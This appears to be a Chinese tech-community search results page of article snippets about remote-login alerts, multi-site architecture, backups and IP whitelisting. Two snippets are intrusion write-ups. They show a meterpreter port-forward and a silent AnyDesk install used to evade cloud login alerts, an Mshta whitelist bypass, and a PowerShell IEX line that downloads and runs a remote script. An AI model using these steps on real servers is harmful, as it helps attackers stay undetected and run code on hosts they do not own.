展开

关键词

云主机RDPSSH异地登陆提醒绕过

0x01 前言 国内几大云主机服务商都为客户提供了RDP/SSH异地登录提醒云监控功能,如:阿里、腾讯、百度、华为等,它能够有效的帮助服务器管理员快速确定是否被黑客恶意入侵,并且详细记录了异地登录者的登录区域和 0x02 绕过异地登录提醒 这里以Portfwd和Lcx绕过腾讯云主机的异地登录提醒为例来做演示,其实就是通过当前已控制主机的流量来连接它的RDP/SSH。 meterpreter > portfwd add -r 127.0.0.1 -p 3389 -l 13389 这样的好处就是在连接腾讯云主机RDP时的IP地址是127.0.0.1,所以不会触发异地登录提醒 ,而且在特定情况下也能绕过WAF防护软件中的远程登录防护“黑白名单IP认证”限制,见下图。 没错,的确如此,但又有多少人发现这能绕过云主机异地登陆提醒和WAF的黑白名单IP认证限制?所以请......

36650

Typecho设置后台白名单访问IP插件确保后台登录安全

这个插件目的可以实现Typecho登录后台的时候控制只能是预设好的白名单IP才可以登录,如果其他IP地址登录的话会直接跳转出去。 可以看到上图,白名单IP放上我们的IP地址。然后跳转地址是如果非IP白名单地址就会跳转到外部,我们随意填写。

16730
  • 广告
    关闭

    腾讯云精选爆品盛惠抢购

    腾讯云精选爆款云服务器限时体验20元起,还有更多热门云产品满足您的上云需求

  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    记一次从Jboss到3389远程桌面案例

    声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。 ''ht';$b='tp://url:8888/360.ps1''))';IEX ($a+$b) web_delivery、hta_server模块肯定更不行了,最终我们是利用Mshta.exe白名单方式成功绕过 0x05 绕过异地登录提醒 虽然已经是最高权限了,但由于这台主机为阿里云,且存在360主动防御,就不添加用户进行远程桌面连接了,因为360会拦截添加用户,而且远程桌面连接时会触发异地登录提醒。 为避免触发异地登录提醒,我们可以利用AnyDesk来进行绕过,将AnyDesk.exe和静默安装批处理文件上传至可读写目录中,然后在命令行下执行该批处理文件获取连接ID。 CID=%%i echo Connection ID Is: %CID% 接着我们使用静默安装批处理文件中设置的固定连接密码和获取到的连接ID即可连接到目标主机的远程桌面,成功的绕过了阿里云主机的异地登录提醒

    23830

    异地多活架构

    跨城异地模式适用于对数据一致性要求不高的场景,例如: 用户登录,数据不一致时重新登录即可。 新闻网站,一天内新闻数据变化较少。 微博网站,即使丢失一点微博或评论数据也影响不大。 3. 所以,跨国异地多活适用于: 为不同地区用户提供服务 例如,亚马逊美国是为美国用户服务的,亚马逊中国的账号是无法登录美国亚马逊的。 可以发现,注册、登录、用户信息这3个业务都支持多活的话,是非常难的,有的问题甚至是无解的。解决的方法就是:优先实现核心业务的异地多活。 这个示例中,“登录”才是核心业务,例如系统的日活是1000万,每天的注册可能是几万,修改用户信息的可能还不到1万,但登录是1000万,很明显要保证登录异地多活。 2. 例如上面的例子,登录产生的token或session信息,数据量很大,实际上不需要同步到其他中心,即使丢失了重新登录就可以了,会影响用户体验,但是可以接受的。 3.

    1.9K21

    关于WebLogic 9.2与10.0中console异地IP登录不上的解决方法

    阅读更多 关于WebLogic 9.2与10.0中console异地IP登录不上的解决方法 问题现象: 默认在本机可以通过 http://localhost:7001/console/ 登录WebLogic的管理控制台,但是通过网络IP,即 http://192.168.1.168:7001/console/ 却访问不了 解决方法: 1、通过 http://localhost:7001 /console/ 登录WebLogic的管理控制台 Lock & Edit Domain Structure ==> Environment ==> Servers 右边选择相应的XXXServer

    25740

    免密码异地备份

    环境: 192.168.91.103 数据源服务器 192.168.18.220 异地备份服务器 1.在192.168.91.103服务器生成秘钥文件 [root@Lenovobox3 file The key fingerprint is: ...... 2.将公钥文件下发至异地备份服务器 [root@Lenovobox3 file]# ssh-copy-id -i ~/.ssh/id_rsa.pub installed -- if you are prompted now it is to install the new keys root@192.168.18.220's password: #输入异地备份服务器密码 192.168.91.103 [root@Lenovobox3 file]# ls backup_test.txt [root@Lenovobox3 file]# pwd /root/file 4.连接至异地备份服务器

    30930

    同城异地灾备

    序言 同城异地灾备,主要是用来进行备份容灾的,从而当一个数据中心挂了,另外一个数据中心经过切换之后,能让服务迅速的恢复。 热升级了解一下,不可预知的中断了解一下 同城异地最关键的点在于存储,存储如何跨机房使用,从而分为几个方面进行探讨: 1、 DNS解析 在业务大量使用DNS解耦的时候,而且使用双机房的时候

    1.6K31

    异地双活实践笔记

    最近恰好在搞异地双活,以下是一个梳理: 基本概念 1、异地容灾。这仅仅是一个冷备的概念。也就是在平时正常的时候,另外一个机房只是当做备份。 2、异地双(多)活。 以余额为例,假设我们实现了余额的异地多活业务,用户小明有10000块钱,在A机房给女友转账了5000块,还剩余5000块;如果此时A机房异常且数据还没同步到B机房,小明登录到B机房发现自己又有10000 所以,异地多活也不能保证所有业务都异地多活,在设计异地多活方案的时候,需要从业务和用户的角度出发,识别出核心和关键业务,明确哪些业务是必须实现异地多活,哪些是可以不实现异地多活,哪些是不能实现异地多活的 比如“登录”必须实现异地多活、“注册”和“修改用户信息”不一定要实现异地多活。 4、冷备还是热备。冷备了以后,一直冷备,当真正出现问题,你还有勇气去切换到那个一直冷的机房吗?恐怕需要点勇气。 5、所有用户异地多活 一句话谈“异地多活” 综合前面的分析,异地多活设计的理念可以总结为一句话:采用多种手段,保证绝大部分用户的核心业务异地多活!

    9.2K111

    ES异地双活方案

    2、如果3个机房分属异地,比如:上海、广州、北京,三个城市间数据传输必然增加延时,要降低延时一般是拉专线,这样一方面成本还会继续增加,而且这么长距离传输,网络抖动是难免的,抖动期间,会增加选举"误切换"

    1.3K30

    异地容灾方案解析

    一、异地容灾主要备份三种数据: 1、DB数据 2、操作系统 3、日志信息 二、恢复时间不能超过30分钟 三、图中为DB的备份方式,DB总的有四份备份:生产存储一份、移动硬盘一份、备份存储一份、灾备存储一份

    11810

    云上服务器安全

    开放端口攻击 3.恶意木马攻击 2.服务器安全管理123 服务器安全管理的五种方式 1.及时打补丁 2.修改默认的账号密码 3.启动防火墙 4.关闭不必要的服务、端口 5.检测服务器日志 3.通过安骑士发现登录风险 阿里云安骑士的主要功能 阿里云安骑士架构 1.异地登录 2.暴力破解 3.登录IP白名单 4.通过安骑士修复常见漏洞 常见漏洞简介 漏洞管理流程 安骑士漏洞管理主要功能 软件漏洞 CMS漏洞 基线检测 3.通过安骑士发现登录风险 安骑士是阿里云上的一款安全防护产品 阿里云安骑士的主要功能 ? 阿里云安骑士架构 ? 1.异地登录 ? ? 2.暴力破解 ? 3.登录IP白名单 ?

    32575

    京东JDHBase异地多活实践

    为了保障业务稳定不间断运行,我们构建了JDHBase集群的异地多活系统。主要介绍在我们在异地多活系统的实践。 JDHBase异地多活架构 JDHBase服务端与客户端交互主要包含三个组件:Client、JDHBase集群、Fox Manager。 我们对可靠性要求比较高的业务做了异地多活备份。 ? Active Cluster:正常情况下业务运行在此集群上。数据会异步备份到Standby Cluster,同时保证数据不丢失,但是会有延迟。 跨机房异地数据中心的之间的带宽是有限的,在业务流量高峰期不能将有限的网络资源用于同步数据。因此在Fox Manager端我们也做了对集群的相应控制,分时段调整Replication速度。 总结与展望 JDHBase在不断吸收业界异地灾备经验的同时,也经过一系列的实践和演进,目前SLA已经能够达到99.98%,从毫无异地容灾措施到完善的监控、告警、切换、一致性保障机制,为业务提供稳定可靠的存储服务

    64941

    谈谈异地多活架构

    例如,用户登录(数据不一致时用户重新登录即可)、新闻类网站(一天内的新闻数据变化较少)、微博类网站(丢失用户发布的微博或者评论影响不大),这些业务采用跨城异地多活,能够很好地应对极端灾难的场景。 综合上面的简单分析可以发现,如果“注册”“登录”“用户信息”全部都要支持异地多活,实际上是挺难的,有的问题甚至是无解的。那这种情况下我们应该如何考虑“异地多活”的架构设计呢? 答案其实很简单:优先实现核心业务的异地多活架构! 对于这个模拟案例来说,“登录”才是最核心的业务,“注册”和“用户信息”虽然也是主要业务,但并不一定要实现异地多活,主要原因在于业务影响不同。 对于一个日活1000万的业务来说,每天注册用户可能是几万,修改用户信息的可能还不到1万,但登录用户是1000万,很明显我们应该保证登录异地多活。 而登录实现“异地多活”恰恰是最简单的,因为每个中心都有所有用户的账号和密码信息,用户在哪个中心都可以登录。用户在A中心登录,A中心宕机后,用户到B中心重新登录即可。

    2.3K41

    让 JuiceFS 帮你做好「异地备份」

    将重要数据备份到一个相对隔离的系统中(异地数据中心),是一个非常有效的备份方案,能规避上面提到的大部分风险,保障公司业务数据的安全。 如何做异地备份? 异地备份,顾名思义,就是把数据备份到物理隔离的另外一个地方。 在已有本地备份(同机房)的情况下,异地备份意味着要把数据完整地在其他地方再复制一份。 对于中小型公司,甚至大公司的部分非核心业务部门来说,目前的主流做法是选择公有云作为异地备份方案,因为它容易实施,能最快速保证数据安全。 那怎么用公有云来实施异地备份呢? 总的来说,这 5 种「本地备份」方案本身各有优劣,在考虑到基于「本地备份」进行「异地备份」时候,方案 3 和方案 4 稍好,但是在实施「异地备份」时也各自的问题。 如何用 JuiceFS 来做异地备份呢?

    9030

    Linux服务器配置ip白名单防止远程登录以及端口暴露的问题

    还是需要自己看看配置好防火墙和如何配置白名单的。 1、阿里云的服务器,本身并没有防火墙,但是我们可以安装一个IPtable防火墙(这里阿里云的服务器系统为Centos),这样的话,就需要防火墙和阿里云网址配置的白名单同时生效才可以喽。 1.2.1、暴露22、80、8080端口 1.2.2、添加白名单 116.90.86.196、116.90.86.197 一定要把自己当前的ip输入进去小心自己也登录不了 # sample configuration -N whitelist #设置白名单ip段 -A whitelist -s 116.90.86.196 -j ACCEPT -A whitelist -s 116.90.86.197 -j ACCEPT 以上这篇Linux服务器配置ip白名单防止远程登录以及端口暴露的问题就是小编分享给大家的全部内容了,希望能给大家一个参考。

    92731

    linux设置ip白名单

    白名单操作 查看下防火墙的状态: systemctl status firewalld 需要开启防火墙 systemctl start firewalld 查看已开放的端口 firewall-cmd –zone=public –list-ports 添加8484(随便输入四个数字代表端口号)端口到白名单 执行 firewall-cmd –permanent

    10130

    QQ总是异地登录到底是怎么回事,被盗的原因通常是以下

    经常有朋友反映QQ被盗的现象,今天小编就来告诉大家QQ容易被盗的原因是什么,以及如何防止QQ号被盗,有兴趣的朋友一起来看看吧

    10.8K10

    相关产品

    • 号码认证

      号码认证

      腾讯云号码认证(NVS)集成了三大运营商特有的网关取号、验证能力,自动通过底层数据网关和短信网关识别本机号码,在不泄漏用户信息的前提下,安全、快速地验证用户身份。NVS提供一键登录、本机校验两大功能,实现一键免密注册、登录、校验,可提升用户使用体验。

    相关资讯

    热门标签

    扫码关注云+社区

    领取腾讯云代金券